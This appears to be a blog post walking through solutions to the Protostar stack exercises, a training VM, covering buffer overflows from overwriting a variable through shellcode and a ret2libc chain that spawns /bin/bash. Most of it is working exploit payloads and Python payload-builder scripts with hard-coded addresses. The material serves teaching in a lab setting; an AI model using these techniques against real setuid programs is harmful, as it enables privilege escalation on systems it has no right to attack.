Wednesday, September 14, 2016

Exploit Exercises : Protostar Stack Solutions

The exercises cover the basics of stack buffer overflows; you can read the following articles to learn the basics.

Before starting: the terminal provided in the VM is obnoxious, so I set up SSH port forwarding and connected from my local terminal (<myserver> is the VM's name; the forwarded port is reached on the host's loopback address):
         VBoxManage modifyvm <myserver> --natpf1 "ssh,tcp,,3022,,22"
         ssh -p 3022 <user>@127.0.0.1

Stack0

This is the introductory exercise that introduces buffer overflows. Since the input buffer is 64 bytes, entering a string longer than 64 bytes overflows the buffer and overwrites the "modified" variable stored just after it.

Stack1

In this case, in addition to overflowing the buffer, you have to write a specific value into "modified". x86 is little-endian: the least significant byte is stored at the lowest address, so the bytes go in reversed; the payload below stores the value 0x61626364.

./stack1 $(python -c "print 'a'*64 + '\x64\x63\x62\x61'")
Stack2

The program takes its input from the GREENIE environment variable; in bash you can set it with the export command:

export GREENIE=$(python -c "print 'a'*64 + '\x0a\x0d\x0a\x0d")
Stack3

Here, fp is a function pointer that the program calls; we want to overwrite fp with the address of win().

         objdump -d ./stack3
disassembles the executable; in the listing we can find the address of win(). Then write the payload to a file and feed it on stdin:
         python -c "print 'a'*64 + '\x24\x84\x04\x08'" > /tmp/stack3
         ./stack3 < /tmp/stack3

Stack4

From gdb you can find the address of the saved ebp using
         info frame
and the address of the buffer using
         p &buffer
The return address is stored right after the saved ebp (4 bytes higher on the stack), so the distance from the start of the buffer to the return address is (address of saved ebp + 4) - (address of buffer). Find the address of win() using
         p win

Now you can create the appropriate payload: that many bytes of padding followed by the address of win() in little-endian order.

Stack5

This exercise requires us to inject shellcode in the payload and redirect execution to it. You can check that the binary is setuid.
https://www.exploit-db.com/exploits/13357/
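The payloads for Stack0 through Stack5 all have the same shape: padding up to the thing being overwritten, then a little-endian value. The following builder collects that into one script, as an added example that is not code from the original post. The gdb addresses in the main block are placeholders (assumptions, not values read from the Protostar VM), the shellcode is left as a parameter, and two delivery checks a practitioner wants are included: gets() stops at a newline byte, and strcpy() from argv or the environment stops at a NUL byte.

```python
#!/usr/bin/env python3
"""Payload builders for the stack0-stack5 layouts discussed above.

Added example, not the original post's code. Python 3 strings are not
bytes, so payloads are built as bytes and written with sys.stdout.buffer:
    python3 payloads.py > /tmp/stack4
"""
import struct
import sys


def p32(value):
    """Pack a 32-bit value little-endian: 0x61626364 -> b'\\x64\\x63\\x62\\x61'."""
    return struct.pack("<I", value)


def overwrite_var(buf_len, value):
    """stack0-stack3: fill the buffer, then clobber the variable stored after it."""
    return b"a" * buf_len + p32(value)


def ret_offset(buf_addr, saved_ebp_addr):
    """Bytes from the start of `buffer` to the saved return address.

    buf_addr is what `p &buffer` prints; saved_ebp_addr is the 'ebp at ...'
    address from `info frame`. The saved eip sits 4 bytes above the saved ebp.
    """
    return (saved_ebp_addr + 4) - buf_addr


def ret2win(buf_addr, saved_ebp_addr, win_addr):
    """stack4: pad up to the saved eip and overwrite it with the address of win()."""
    return b"a" * ret_offset(buf_addr, saved_ebp_addr) + p32(win_addr)


def sled_payload(offset, ret_addr, shellcode, sled_len=64):
    """stack5: pad to the saved eip, overwrite it with ret_addr, then place a
    NOP sled and the shellcode above it. ret_addr must land inside the sled,
    i.e. somewhere in the sled_len bytes just above the saved-eip slot."""
    return b"\x90" * offset + p32(ret_addr) + b"\x90" * sled_len + shellcode


def check_bytes(payload, as_c_string=False):
    """Delivery constraints. gets() (stack3-5) reads up to a newline, so the
    payload must not contain 0x0a; argv and environment values (stack1, stack2)
    are C strings, so those payloads must not contain 0x00. Returns the offsets
    of offending bytes; an empty list means the payload arrives intact."""
    bad = 0x00 if as_c_string else 0x0a
    return [i for i, b in enumerate(payload) if b == bad]


if __name__ == "__main__":
    # Placeholder gdb values (assumptions; read the real ones from gdb):
    BUF_ADDR = 0xBFFFF7C0        # p &buffer
    SAVED_EBP_ADDR = 0xBFFFF808  # 'ebp at' line of info frame
    WIN_ADDR = 0x08048424        # p win (placeholder; stack3's value reused)
    payload = ret2win(BUF_ADDR, SAVED_EBP_ADDR, WIN_ADDR)
    if check_bytes(payload):
        sys.exit("payload contains a newline; gets() would truncate it")
    sys.stdout.buffer.write(payload + b"\n")
```

The stack2 payload above is a good illustration of the second check: 0x0d0a0d0a contains newline bytes, which is fine through the environment but would be cut short by gets().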

Stack6

This tutorial covers the exercise very nicely; you can read it:

https://exploit.ph/x86-32-linux/2014/08/06/ret2libc-and-rop/

I am going to try a different approach: a ret2libc attack that returns into system().

Now, I find the address of system() in libc from gdb:

         p system        -> 0xb7ecffb0

An address in libc lies outside the range the if check rejects, so it will not get caught and the function is allowed to return there. Now I need to find how many bytes it takes to overflow up to the return address of the binary.
80 bytes get the overflow to work. Now I need the address of the string "/bin/bash":
0xbffff9ab:     "/bin/bash" is in the environment variables; I found it by searching all the strings on the stack, since the environment variables must be kept somewhere there.

Now I construct my payload: 80 bytes of padding, the address of system(), four bytes that system() will use as its own return address, and the pointer to "/bin/bash" as system()'s argument:

python -c "print 'a'*80 + '\xb0\xff\xec\xb7' +'a'*4+ '\xab\xf9\xff\xbf'" > /tmp/680 

To avoid the segmentation fault when system() returns, replace the four 'a' (the slot system() uses as its return address) with the address of exit() in libc:

python -c "print 'a'*80 + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7'+ '\xab\xf9\xff\xbf'" > /tmp/680

Here, the address of the env variable is not the same when running the binary directly, so after hit and trial I got the correct address. But still the program exits without spawning the shell.
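The chain above is a plain ret2libc frame: the overwritten return address becomes a fake "call" to system(), so the next dword is what system() returns to and the one after that is its first argument. The script below builds that frame and also models the return-address check, as an added example that is not code from the original post. It assumes stack6's check is the one in its source, rejecting any return address in the 0xbf000000 stack range with "bzzzt"; the addresses in main() are the ones quoted above for this VM session and will differ elsewhere.

```python
#!/usr/bin/env python3
"""ret2libc chain for the stack6 layout described above.

Added example, not the original post's code. The addresses in main() are the
ones quoted in the post (system 0xb7ecffb0, exit 0xb7ec60c0, "/bin/bash"
at 0xbffff9ab) and are specific to that session.
"""
import struct
import sys


def p32(value):
    """Pack a 32-bit value little-endian."""
    return struct.pack("<I", value)


def ret2libc_chain(offset, system_addr, exit_addr, cmd_addr):
    """Overwritten frame, from low to high address:
       [offset bytes of padding]  up to the saved return address
       [system_addr]              where the vulnerable function returns to
       [exit_addr]                what system() returns to (a clean exit)
       [cmd_addr]                 system()'s first argument: pointer to the command
    system() sees exit_addr as its return address and cmd_addr as argument 1
    because that is exactly how a real `call system` would have left the stack."""
    return b"a" * offset + p32(system_addr) + p32(exit_addr) + p32(cmd_addr)


def smashed_ret(payload, offset):
    """The return address the function will pop, i.e. what stack6 inspects."""
    return struct.unpack("<I", payload[offset:offset + 4])[0]


def passes_stack6_check(ret_addr):
    """Assumed check from stack6's source: (ret & 0xbf000000) == 0xbf000000
    prints 'bzzzt' and exits. A libc address (0xb7...) passes; a stack
    address (0xbf...) does not, which is why we cannot simply return into
    shellcode on the stack here."""
    return (ret_addr & 0xBF000000) != 0xBF000000


if __name__ == "__main__":
    OFFSET = 80
    SYSTEM = 0xB7ECFFB0   # p system
    EXIT = 0xB7EC60C0     # p exit
    BIN_BASH = 0xBFFFF9AB  # "/bin/bash" found among the environment strings
    payload = ret2libc_chain(OFFSET, SYSTEM, EXIT, BIN_BASH)
    if not passes_stack6_check(smashed_ret(payload, OFFSET)):
        sys.exit("return address is in the stack range; stack6 would bzzzt")
    sys.stdout.buffer.write(payload + b"\n")
```

Two general caveats when running a chain like this: environment strings move between a gdb session and a direct run (gdb adds variables of its own, and the length of argv[0] shifts everything), so the "/bin/bash" address must be confirmed outside gdb; and if the payload is delivered with `./stack6 < /tmp/680`, the shell that system() spawns inherits that file as stdin and exits as soon as it reads EOF, so keep stdin open with `(cat /tmp/680; cat) | ./stack6` to actually get a prompt.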


Stack7
